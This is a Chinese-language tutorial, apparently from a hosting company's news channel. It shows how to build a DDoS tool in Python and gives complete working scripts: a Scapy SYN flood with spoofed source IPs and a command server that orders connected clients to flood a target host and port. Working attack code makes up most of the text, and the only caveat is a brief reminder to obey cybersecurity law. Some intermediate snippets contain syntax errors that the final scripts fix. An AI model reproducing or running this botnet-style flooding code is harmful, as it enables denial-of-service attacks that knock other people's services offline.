您好,登錄后才能下訂單哦!
這篇文章主要介紹Python如何實(shí)現(xiàn)DDos攻擊,文中介紹的非常詳細(xì),具有一定的參考價值,感興趣的小伙伴們一定要看完!
SYN 泛洪攻擊
SYN泛洪攻擊是一種比較常用的Dos方式之一。通過發(fā)送大量偽造的 TCP 連接請求,使被攻擊主機(jī)資源耗盡(通常是 CPU 滿負(fù)荷或內(nèi)存不足)的攻擊方式
我們都知道建立 TCP 連接需要三次握手。正常情況下客戶端首先向服務(wù)器端發(fā)送SYN報文,隨后服務(wù)端返回以SYN+ACK報文,最后客戶端向服務(wù)端發(fā)送ACK報文完成三次握手
而SYN泛洪攻擊則是客戶端向服務(wù)器發(fā)送SYN報文之后就不再響應(yīng)服務(wù)器回應(yīng)的報文。由于服務(wù)器在處理 TCP 請求時,會在協(xié)議棧留一塊緩沖區(qū)來存儲握手的過程,當(dāng)然如果超過一定時間內(nèi)沒有接收到客戶端的報文,本次連接在協(xié)議棧中存儲的數(shù)據(jù)將會被丟棄。攻擊者如果利用這段時間發(fā)送大量的連接請求,全部掛起在半連接狀態(tài)。這樣將不斷消耗服務(wù)器資源,直到拒絕服務(wù)
Scapy3k 基本用法
Scapy3k其實(shí)就是Scapy的 Python3 版本,以下簡稱Scapy。Scapy是一個強(qiáng)大的交互式數(shù)據(jù)包處理程序??捎脕戆l(fā)送、嗅探、解析和偽造網(wǎng)絡(luò)數(shù)據(jù)包。在網(wǎng)絡(luò)攻擊和滲透測試重應(yīng)用非常廣泛。Scapy是一個獨(dú)立的程序同時還可以作為 Python 的第三方庫使用
首先安裝Scapy3k,Windows 不方便,下面的操作我都是在 Linux 中進(jìn)行的
sudo pip install scapy
運(yùn)行scapy
sudo scapy
因為Scapy發(fā)送數(shù)據(jù)包需要root權(quán)限,所以這里加上sudo。另外運(yùn)行的時候會出現(xiàn)一些警告信息,因為沒有安裝相應(yīng)的依賴包,不過暫時用不到,所以不用管
接下來我們用Scapy構(gòu)造一個簡單的數(shù)據(jù)包
pkt = IP(dst = "192.168.50.10")
接下來構(gòu)造SYN數(shù)據(jù)包,并發(fā)送出去
pkt = IP(src = "125.4.2.1",dst="192.168.50.10")/TCP(dport=80,flags="S") send(pkt)
我們構(gòu)造了一個 IP 包和 TCP 包,并將它們組合到一塊,這樣就有了一個完整的 TCP 數(shù)據(jù)包,否則是無法發(fā)送出去的。IP 包中我們指定了源地址src和目的地址dst,其中src是我們偽造的地址,這也是保護(hù)攻擊者的一種方式。flags的值設(shè)定為S,說明我們要發(fā)送的是一個SYN數(shù)據(jù)包。非常簡單的一段指令就夠早了一個偽造了源 IP 地址的SYN數(shù)據(jù)包
代碼實(shí)現(xiàn)
現(xiàn)在我們要用 Python 以第三方庫的形式使用Scapy,使用方法和用交互式 Shell 的方式一樣
前面我們構(gòu)造了SYN數(shù)據(jù)包,現(xiàn)在需要實(shí)現(xiàn)隨機(jī)偽造源 IP 地址、以及不同的源端口向目標(biāo)主機(jī)發(fā)送SYN數(shù)據(jù)包:
import random from scapy.all import * def synFlood(tgt,dPort): srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport = dPort, flags="S") packet = ipLayer / tcpLayer send(packet)
DDos 實(shí)現(xiàn)思路
前面我們已經(jīng)實(shí)現(xiàn)了SYN泛洪攻擊,而DDos則是多臺主機(jī)一起發(fā)起攻擊,我們只需要能發(fā)送命令,讓連接到服務(wù)器的客戶端一起向同一目標(biāo)發(fā)起攻擊就可以了
世界最大的黑客組織Anonymous經(jīng)常使用LOIC(low Orbit Ion Cannon,滴軌道離子炮)進(jìn)行大規(guī)模的DDos。LOIC有個HIVEMIND模式,用戶可以通過連接到一臺 IRC 服務(wù)器,當(dāng)有用戶發(fā)送命令,任何以HIVEMIND模式連接到 IRC 服務(wù)器的成員都會立即攻擊該目標(biāo)
這種方式的優(yōu)點(diǎn)事不需要傀儡機(jī),可以有很多 "志同道合" 的人一起幫助你實(shí)現(xiàn)DDos,不過不太適合在傀儡機(jī)中使用。當(dāng)然實(shí)現(xiàn)思路有很多,根據(jù)不同情況的選擇也會不同。而這里我們將采用客戶端、服務(wù)器的方式來實(shí)現(xiàn)DDos,這種方式非常簡單,可擴(kuò)展性也比較強(qiáng)
argparse 模塊
由于 Server 端需要發(fā)送命令去控制 Client 端發(fā)起攻擊,所以這里我們先規(guī)定好命令格式
#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>
-H后面是被攻擊主機(jī)的 IP 地址,-p指定被攻擊的端口號,-c控制攻擊的開始與停止
命令制定好了,接下來看一下如何使用命令解析庫argparse
# Import argparse package import argparse # New ArgumentParser object parser = argparse.ArgumentParser(description="Process some integers.") # Add parameter parser.add_argument('-p', dest='port', type = int, help = 'An port number!') # Parse command line arguments args = parser.parse_args() print("Port:",args.port)
上面的代碼中,我們創(chuàng)建了一個ArgumentParser對象,description參數(shù)是對命令行解析的一個描述信息,通常在我們使用-h命令的時候顯示。add_argument添加我們要解析的參數(shù),這里我們只添加了一個-p參數(shù),dest是通過parse_args()函數(shù)返回的對象中的一個屬性名稱。type就是解析參數(shù)的類型。help指定的字符串是為了生成幫助信息。argparse默認(rèn)就支持-h參數(shù),只要我們在添加參數(shù)的時候指定help的值就可以生成幫助信息了
socket 模塊
Python 中的socket提供了訪問 BSDsocket的接口,可以非常方便的實(shí)現(xiàn)網(wǎng)絡(luò)中的信息交換。通常我們使用socket的時候需要指定ip地址、端口號、協(xié)議類型。在進(jìn)行socket編程之前我們先了解一下客戶端(Client)和服務(wù)器(Server)的概念。通俗的講,主動發(fā)起連接請求的稱為客戶端,監(jiān)聽端口響應(yīng)連接的稱為服務(wù)器。下面我寫一個客戶端和服務(wù)器的例子:
客戶端
# Import socket package import socket # Create socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Establish connection s.connect(('192.168.0.100', 7786))
上面這個例子我們首先導(dǎo)入 socket 庫,然后創(chuàng)建了一個 socket 對象,socket 對象中的參數(shù)AF_INET表示我們使用的是 IPV4 協(xié)議,SOCK_STREAM則表示我們使用的是基于流的 TCP 協(xié)議。最后我們指定ip地址和端口號建立連接
服務(wù)器
# Import socket package import socket cliList = [] # Create socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Specify IP & Port s.bind(('0.0.0.0', 7786)) # Strat monitor s.listen(10) while True: # Receive a new connection sock, addr = s.accept() # Add sock to the list cliList.append(sock)
服務(wù)器的寫法比客戶端稍微復(fù)雜一些,在創(chuàng)建完 socket 之后,要綁定一個地址和端口,這里的0.0.0.0表示綁定到所有的網(wǎng)絡(luò)地址,端口號只要是沒被占用的就可以。之后開始監(jiān)聽端口,并在參數(shù)中指定最大連接數(shù)為 10。最后循環(huán)等待新的連接,并將已連接的 socket 對象添加到列表中。更多相關(guān)細(xì)節(jié)可以查看 Python 官方文檔
代碼實(shí)現(xiàn)
Server 端
由于 Server 端能等待 Client 主動連接,所以我們在 Server 端發(fā)送命令,控制 Client 端發(fā)起SYN泛洪攻擊
在主函數(shù)中我們創(chuàng)建 socket,綁定所有網(wǎng)絡(luò)地址和58868端口并開始監(jiān)聽,之后我們新開一個線程來等待客戶端的連接,以免阻塞我們輸入命令
def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target=waitConnect,args(s,)) t.start()
由于我們要給所有客戶端發(fā)送命令,所以我們在新開的線程中將連接進(jìn)來的 socket 添加到一個 list 中,這個稍后介紹,但在主函數(shù)中我們第一次輸入命令之前需要至少有一個客戶端鏈接到服務(wù)器,所以這里我判斷了一下socket的長度
print('Wait at least a client connection!') while not len(socketList): pass print('It has been a client connection!')
現(xiàn)在循環(huán)等待輸入命令,輸入之后判斷命令是否滿足命令格式的基本要求,如果滿足,就把命令發(fā)送給所有客戶端
while True: print("=" * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"') # Wait for input command cmd_str = input('Please input cmd:') if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str)
現(xiàn)在程序的大體框架已經(jīng)有了,接下來編寫主函數(shù)中沒有完成的子功能。首先我們應(yīng)該實(shí)現(xiàn)等待客戶端的函數(shù),方便開啟新的線程
在這個函數(shù)中,我們只需要循環(huán)等待客戶端的連接就可以,新連接的 socket 要判斷一下是否在 socketList 中已經(jīng)存儲過了,如果沒有,就添加到 socketList 中
# wait connection def waitConnect(s): while True: sock, addr = s.accept() if sock not in socketList: socketList.append(socket)
我們再來實(shí)現(xiàn)發(fā)送命令的函數(shù),這個函數(shù)會遍歷 socketList,將每個 socket 都調(diào)用一次 send 將命令發(fā)送出去
# send command def sendCmd(cmd): print("Send command......") for sock in socketList: sock.send(cmd.encode = ('UTF-8'))
至此我們的Server端就完成了。新建一個文件,將其命名為ddosSrv.py,向其中添加如下代碼
import socket import argparse from threading import Thread socketList = [] # Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>' # Send command def sendCmd(cmd): print("Send command......") for sock in socketList: sock.send(cmd.encode('UTF-8')) # Wait connect def waitConnect(s): while True: sock, addr = s.accept() if sock not in socketList: socketList.append(sock) def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 58868)) s.listen(1024) t = Thread(target = waitConnect, args = (s, )) t.start() print('Wait at least a client connection!') while not len(socketList): pass print('It has been a client connection!') while True: print('=' * 50) print('The command format:"#-H xxx.xxx.xxx.xxx -p xxx -c <start>"') # Wait for input command cmd_str = input("Please input cmd:") if len(cmd_str): if cmd_str[0] == '#': sendCmd(cmd_str) if __name__ == '__main__': main()
Client 端
我們將在 Client 端實(shí)現(xiàn)對主機(jī)的SYN泛洪攻擊,并在腳本啟動后主動連接 Server 端,等待 Server 端發(fā)送命令
在主函數(shù)中我們先創(chuàng)建ArgumentParser()對象,并將需要解析的命令參數(shù)添加好
def main(): p = argparse.ArgumentParser() p.add_argument('-H', dest = 'host', type = str) p.add_argument('-p', dest = 'port', type = int) p.add_argument('-c', dest = 'cmd', type = str)
現(xiàn)在可以創(chuàng)建 socket,連接服務(wù)器了。這里為了測試,我們連接到本地的 58868 端口
try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', 58868)) print('To connected server was success!') print('=' * 50) cmdHandle(s, p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0)
我們將接受命令和處理命令定義在一個單獨(dú)的函數(shù)中。這里我們使用一個全局變量,用于判斷是否有進(jìn)程正在發(fā)起SYN泛洪攻擊。之后就開始循環(huán)接收命令了,接收道德數(shù)據(jù)是byte型,我們需要對其進(jìn)行解碼,解碼之后才是字符串。如果接收到的數(shù)據(jù)長度為 0,就跳過后續(xù)的內(nèi)容,重新接收數(shù)據(jù)
# Process command def cmdHandle(sock, parser): global curProcess while True: # Receive command data = sock.recv(1024).decode('UTF-8') if len(data) == 0: print('The data is empty') continue;
如果數(shù)據(jù)長度不為 0,就判斷是否具有命令基本格式的特征#,滿足基本條件就需要用ArgumentParser對象來解析命令
if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd
命令參數(shù)解析出來后,還需要判斷到底是start命令還是stop命令。如果是start命令,首先要判斷當(dāng)前是否有進(jìn)程在運(yùn)行,如果有進(jìn)程判斷進(jìn)程是否存活。如果當(dāng)前有進(jìn)程正在發(fā)起SYN泛洪攻擊,我們就先結(jié)束這個進(jìn)程,并清空屏幕,然后再啟動一個進(jìn)程,發(fā)起SYN泛洪攻擊
# DDos start command if m_cmd.lower() == 'start': if curProcess != None and curprocess.is_alive(): # End of process curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target = synFlood, args = (m_host, m_port)) p.start() curProcess = p
如果命令是stop,并且有進(jìn)程存活,就直接結(jié)束這個進(jìn)程,并清空屏幕,否則就什么也不做
# DDos stop command elif m_cmd.lower() == 'stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!')
最后,新建一個文件,命名為ddosCli.py,向其中添加如下代碼
# -*- coding: utf-8 -*- import sys import socket import random import argparse from multiprocessing import Process from scapy.all import * import os isWorking = False curProcess = None # SYN flood attack def synFlood(tgt,dPort): print('='*100) print('The syn flood is running!') print('='*100) srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199'] for sPort in range(1024,65535): index = random.randrange(4) ipLayer = IP(src=srcList[index], dst=tgt) tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") packet = ipLayer / tcpLayer send(packet) # Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start>' # Process command def cmdHandle(sock,parser): global curProcess while True: # Receive command data = sock.recv(1024).decode('utf-8') if len(data) == 0: print('The data is empty') return if data[0] == '#': try: # Parse command options = parser.parse_args(data[1:].split()) m_host = options.host m_port = options.port m_cmd = options.cmd # DDos start command if m_cmd.lower() == 'start': if curProcess != None and curProcess.is_alive(): curProcess.terminate() curProcess = None os.system('clear') print('The synFlood is start') p = Process(target=synFlood,args=(m_host,m_port)) p.start() curProcess = p # DDos stop command elif m_cmd.lower() =='stop': if curProcess.is_alive(): curProcess.terminate() os.system('clear') except: print('Failed to perform the command!') def main(): # Add commands that need to be parsed p = argparse.ArgumentParser() p.add_argument('-H', dest='host', type=str) p.add_argument('-p', dest='port', type=int) p.add_argument('-c', dest='cmd', type=str) print("*" * 40) try: # Create socket object s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # Connect to Server s.connect(('127.0.0.1',58868)) print('To connected server was success!') print("=" * 40) # Process command cmdHandle(s,p) except: print('The network connected failed!') print('Please restart the script!') sys.exit(0) if __name__ == '__main__': main()
程序測試
首先運(yùn)行Server端腳本:
sudo python3 ddosSrv.py
然后再運(yùn)行Client端腳本,一定要用root權(quán)限運(yùn)行
此時可以看到Client端已經(jīng)提示連接成功了
Server端也提示有一個客戶端連接了
輸入一個命令測試一下,這里我以我自己的博客為目標(biāo)進(jìn)行測試,各位請遵守網(wǎng)絡(luò)安全法
看到Client端已經(jīng)開始發(fā)送數(shù)據(jù)包了,說明已經(jīng)發(fā)起了SYN泛洪攻擊
以上是“Python如何實(shí)現(xiàn)DDos攻擊”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。